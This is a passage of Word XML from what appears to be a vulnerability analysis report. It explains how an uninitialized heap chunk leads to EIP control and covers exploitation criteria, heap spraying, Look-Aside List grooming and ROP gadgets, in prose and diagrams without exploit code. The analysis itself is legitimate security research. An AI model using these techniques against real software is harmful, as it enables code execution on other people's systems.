        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1034" style="position:absolute;margin-left:113.85pt;margin-top:94.25pt;width:51.1pt;height:15.05pt;z-index:251665408" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00EC13BF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3933825" cy="3891280"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="19" name="Picture 11" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 4.2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Screen Shot 2015-12-17 at 4.24.55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AE" w:rsidRDefault="008915AE" w:rsidP="008915AE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6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – Memory contents of object and EIP manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003800E0" w:rsidRDefault="00376F03">
      <w:r>
        <w:t>The value stored in the</w:t>
      </w:r>
      <w:r w:rsidR="004A5D85">
        <w:t xml:space="preserve"> uninitialized</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> heap </w:t>
      </w:r>
      <w:r w:rsidR="004A5D85">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of size 4 will then be </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t>stored as an object’s attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, located at </w:t>
      </w:r>
      <w:r w:rsidR="005B1B2F">
        <w:t>EBX</w:t>
      </w:r>
      <w:r w:rsidR="00713C7C">
        <w:t>+0x5</w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidR="00713C7C">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0039146A">
        <w:t xml:space="preserve"> From figure 6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t xml:space="preserve">the data dependency can be seen </w:t>
      </w:r>
      <w:r w:rsidR="004C0609">
        <w:t xml:space="preserve">easily </w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve">by tracing the memory contents; </w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t>0x02fd2a40 (</w:t>
      </w:r>
      <w:r w:rsidR="005B1B2F">
        <w:t>ECX</w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t>) is located at ebx+0x54, and 0x02fd2530 (</w:t>
      </w:r>
      <w:r w:rsidR="000E2B6F">
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t xml:space="preserve">) is </w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve">located at </w:t>
      </w:r>
      <w:r w:rsidR="000E2B6F">
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidR="00F5347A">
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="004A5D85">
        <w:t xml:space="preserve"> pointer</w:t>
      </w:r>
      <w:r w:rsidR="001B43F2">
        <w:t xml:space="preserve"> located</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve"> at </w:t>
      </w:r>
      <w:r w:rsidR="005B1B2F">
        <w:t>EAX</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve"> + 0x1c</w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t xml:space="preserve"> will </w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t>eventually</w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t xml:space="preserve"> be </w:t>
      </w:r>
      <w:r w:rsidR="004A5D85">
        <w:t xml:space="preserve">dereferenced and </w:t>
      </w:r>
      <w:r w:rsidR="008915AE">
        <w:t>called by</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="0016467F">
        <w:t>instruction</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t xml:space="preserve"> shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="004A5D85">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="003800E0">
        <w:t>, allowing an attacker to control EIP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060121B" w:rsidRDefault="000A2A35" w:rsidP="00360360">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc438718795"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3. Exploitation of vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="003C3BDB" w:rsidRPr="003C3BDB" w:rsidRDefault="003C3BDB" w:rsidP="003C3BDB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc438718796"/>
      <w:r>
        <w:t>3.1 Criteria for successful exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00AB4F55" w:rsidRDefault="009A3342" w:rsidP="00AB4F55">
      <w:r>
        <w:t>In order to exploit the vulnerability, an attacker would have to be able to write to the memory address and free it before it is initialized.</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E7043E">
        <w:t>Making use of</w:t>
      </w:r>
      <w:r w:rsidR="00861C85">
        <w:t xml:space="preserve"> JavaScript heap sprays, an attacker</w:t>
      </w:r>
      <w:r w:rsidR="00667C3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00024BB6">
        <w:t>will be abl</w:t>
      </w:r>
      <w:r w:rsidR="008E2B5C">
        <w:t xml:space="preserve">e to write arbitrary values to the memory, </w:t>
      </w:r>
      <w:r w:rsidR="00024BB6">
        <w:t>contro</w:t>
      </w:r>
      <w:r w:rsidR="008E2B5C">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00024BB6">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="008E2B5C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00A33D37">
        <w:t xml:space="preserve"> the values of heaps when</w:t>
      </w:r>
      <w:r w:rsidR="00024BB6">
        <w:t xml:space="preserve"> initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F3007" w:rsidRDefault="007F3007" w:rsidP="00AB4F55">
      <w:r>
        <w:t>In order to exploit this vulnerabi</w:t>
      </w:r>
      <w:r w:rsidR="00223E53">
        <w:t>lity, an attacker must have control over</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a few </w:t>
      </w:r>
      <w:r w:rsidR="00B53412">
        <w:t>memory locations</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A33D37" w:rsidRDefault="007F3007" w:rsidP="007F3007">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The heap </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">of size </w:t>
      </w:r>
      <w:r w:rsidR="00D05D80">
        <w:t>4 must</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D05D80">
        <w:t>contain a valid address pointer at location offset+0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009936A0" w:rsidRDefault="009936A0" w:rsidP="007F3007">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The valid address pointer needs to contain another valid address pointer at offset+0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00024BB6" w:rsidRDefault="00EC13BF" w:rsidP="00AB4F55">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="009936A0">
        <w:t xml:space="preserve">second </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">valid address pointer has to point to a location where the address at offset+0x1c points to a valid instruction </w:t>
      </w:r>
      <w:r w:rsidR="00036C3E">
        <w:t>address</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> which can be executed, a ROP gadget for example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C4257" w:rsidRDefault="00925C54" w:rsidP="00477827">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>With the above, the attacker would be able to control the EIP</w:t>
      </w:r>
      <w:r w:rsidR="002F7042">
        <w:t xml:space="preserve"> register</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F4918" w:rsidRDefault="000A4F2C" w:rsidP="005F4918">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1045" style="position:absolute;margin-left:222.8pt;margin-top:230.7pt;width:51.1pt;height:15.05pt;z-index:251671552" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1044" style="position:absolute;margin-left:60.2pt;margin-top:133.6pt;width:51.1pt;height:15.05pt;z-index:251670528" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1043" style="position:absolute;margin-left:113.85pt;margin-top:94.25pt;width:51.1pt;height:15.05pt;z-index:251669504" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00EC13BF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3933825" cy="3891280"/>
            <wp:effectExtent l="19050" t="0" r="9525" b="0"/>
            <wp:docPr id="22" name="Picture 11" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 4.2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Desktop\Screen Shot 2015-12-17 at 4.24.55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3BF" w:rsidRDefault="005F4918" w:rsidP="005F4918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7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – Illustration of memory that attacker needs to have control over.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC13BF" w:rsidRDefault="0040544F" w:rsidP="00AB4F55">
      <w:r>
        <w:t>Using figure 7 to illustrate</w:t>
      </w:r>
      <w:r w:rsidR="00DA644B">
        <w:t xml:space="preserve"> better, for criteria #1,</w:t>
      </w:r>
      <w:r w:rsidR="005F4918">
        <w:t xml:space="preserve"> the heap of size 4 contains the value 0x2fd2a40, this value is then copied to the object that ebx in figure 7 is pointing at. </w:t>
      </w:r>
      <w:r w:rsidR="00223E53">
        <w:t>For criteria #2, the address pointer 0x2fd2a40 must contain another address pointer; in this case it is 0x2fd2530. For criteria #3, the ad</w:t>
      </w:r>
      <w:r w:rsidR="00036C3E">
        <w:t>dress pointer 0x2fd2530 must have a valid instruction address at its offset +0x1c; in this case, it is 0x80000000.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00036C3E" w:rsidRDefault="0092048C" w:rsidP="0092048C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc438718797"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00101BCE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C148DB" w:rsidRPr="0092048C">
        <w:t>Crafting</w:t>
      </w:r>
      <w:r w:rsidR="00C148DB">
        <w:t xml:space="preserve"> an exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w:rsidR="0092184F" w:rsidRPr="0092184F" w:rsidRDefault="0092048C" w:rsidP="005E5E3F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc438718798"/>
      <w:r>
        <w:t xml:space="preserve">3.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="0092184F">
        <w:t>Controlling the EIP</w:t>
      </w:r>
      <w:r w:rsidR="00FD5031">
        <w:t xml:space="preserve"> register</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00C148DB" w:rsidRDefault="007E0773" w:rsidP="00C148DB">
      <w:r>
        <w:t xml:space="preserve">One way to exploit this is to make use of the </w:t>
      </w:r>
      <w:r w:rsidR="005A622A">
        <w:t>Look-Aside</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Lists in Windows Front End Manager for heap. </w:t>
      </w:r>
      <w:r w:rsidR="005A622A">
        <w:t>A Look-Aside List is a singly linked list where free blocks of the same size are linked together. Using the Look-A</w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve">side List, an attacker would be able to achieve criteria 1 and 2 and later 3. Since the heap </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve">of size 4 </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t>(excluding heap headers)</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t>is allocated from a</w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve"> bucket containing </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">heap chunks </w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve"> bytes</w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>excluding</w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve"> heap headers)</w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t xml:space="preserve">, the pointers in criteria #1 and #2 would </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t>have to be allocated from the same bucket as well</w:t>
      </w:r>
      <w:r w:rsidR="000A34E7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A34E7" w:rsidRDefault="00C915F8" w:rsidP="00C148DB">
      <w:r>
        <w:t xml:space="preserve">To illustrate better, imagine the following as 3 </w:t>
      </w:r>
      <w:r w:rsidR="00135291">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t>-byte</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F945AE">
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve"> chunks (total size)</w:t>
      </w:r>
      <w:r w:rsidR="00F945AE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C266B">
        <w:t>The blue heap would be the</w:t>
      </w:r>
      <w:r w:rsidR="00675423">
        <w:t xml:space="preserve"> heap</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="002B1E01">
        <w:t xml:space="preserve">of size 4 </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">(user requested size) </w:t>
      </w:r>
      <w:r w:rsidR="002B1E01">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="008C266B">
        <w:t xml:space="preserve"> it contains a pointer to the red heap</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="002B1E01">
        <w:t>at offset</w:t>
      </w:r>
      <w:r w:rsidR="00BE58DC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B1E01">
        <w:t>+0 fulfilling criteria #1</w:t>
      </w:r>
      <w:r w:rsidR="008C266B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00BF3737">
        <w:t xml:space="preserve"> Since the red heap contains a link to the green heap at offset +0, criteria #2 is fulfilled as well.</w:t>
      </w:r>
    </w:p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0A34E7" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00C148DB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0A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00C148DB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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A4F2C" w:rsidP="00C148D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6" type="#_x0000_t34" style="position:absolute;margin-left:-.35pt;margin-top:5pt;width:36.75pt;height:34.6pt;rotation:90;z-index:251672576;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" o:connectortype="elbow" adj="10785,-215345,-119461">
                  <v:stroke endarrow="block"/>
                </v:shape>
              </w:pict>
            </w:r>
            <w:r w:rsidR="000A34E7" w:rsidRPr="002F01B3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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00C148DB">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000A34E7" w:rsidRDefault="000A34E7" w:rsidP="00C148DB"/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0A34E7" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A4F2C" w:rsidP="00D928B5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7" type="#_x0000_t34" style="position:absolute;margin-left:-.35pt;margin-top:5.6pt;width:36.75pt;height:34.6pt;rotation:90;z-index:251673600;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" o:connectortype="elbow" adj="10785,-240222,-119461">
                  <v:stroke endarrow="block"/>
                </v:shape>
              </w:pict>
            </w:r>
            <w:r w:rsidR="000A34E7" w:rsidRPr="002F01B3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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000A34E7" w:rsidRDefault="000A34E7" w:rsidP="00C148DB"/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0A34E7" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7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EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7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EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01B3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EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="000A34E7" w:rsidRPr="002F01B3" w:rsidRDefault="000A34E7" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000A34E7" w:rsidRPr="00C148DB" w:rsidRDefault="000A34E7" w:rsidP="00C148DB"/>
    <w:p w:rsidR="00AB4F55" w:rsidRDefault="00064175" w:rsidP="00AB4F55">
      <w:r>
        <w:t>This is made possible as the blue heap is not initialized, therefore the pointer value would not have been overwritten.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51774" w:rsidRDefault="00A87AB7" w:rsidP="00AB4F55">
      <w:r>
        <w:t>The next step is t</w:t>
      </w:r>
      <w:r w:rsidR="004D370A">
        <w:t>o fulfill criteria #</w:t>
      </w:r>
      <w:r w:rsidR="00FE1070">
        <w:t xml:space="preserve">3 and to have control of the </w:t>
      </w:r>
      <w:r w:rsidR="00453BAD">
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="00FE1070">
        <w:t xml:space="preserve"> at offset + 0x1c</w:t>
      </w:r>
      <w:r w:rsidR="00397D19">
        <w:t xml:space="preserve"> (ROP Gadget)</w:t>
      </w:r>
      <w:r w:rsidR="00E57B6A">
        <w:t>.</w:t>
      </w:r>
    </w:p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DA62C9" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="000A4F2C" w:rsidP="00D928B5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8" type="#_x0000_t34" style="position:absolute;margin-left:-.35pt;margin-top:5pt;width:36.75pt;height:34.6pt;rotation:90;z-index:251675648;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" o:connectortype="elbow" adj="10785,-329150,-119461">
                  <v:stroke endarrow="block"/>
                </v:shape>
              </w:pict>
            </w:r>
            <w:r w:rsidR="00DA62C9" w:rsidRPr="002F01B3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C6D9F1" w:themeFill="text2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DA62C9" w:rsidRDefault="00DA62C9" w:rsidP="00DA62C9"/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DA62C9" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F01B3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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="000A4F2C" w:rsidP="00D928B5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1049" type="#_x0000_t34" style="position:absolute;margin-left:-.35pt;margin-top:5.6pt;width:36.75pt;height:34.6pt;rotation:90;z-index:251676672;mso-position-horizontal-relative:text;mso-position-vertical-relative:text" o:connectortype="elbow" adj="10785,-354059,-119461">
                  <v:stroke endarrow="block"/>
                </v:shape>
              </w:pict>
            </w:r>
            <w:r w:rsidR="00DA62C9" w:rsidRPr="002F01B3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F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="002F01B3" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DA62C9" w:rsidRDefault="00DA62C9" w:rsidP="00DA62C9"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="980"/>
        <w:gridCol w:w="704"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DA62C9" w:rsidTr="00FD791B">
        <w:trPr>
          <w:trHeight w:val="269"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="00FA2C47" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="959" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="00FA2C47" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FA2C47">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w:rsidR="00DA62C9" w:rsidRPr="00FA2C47" w:rsidRDefault="00DA62C9" w:rsidP="00D928B5">
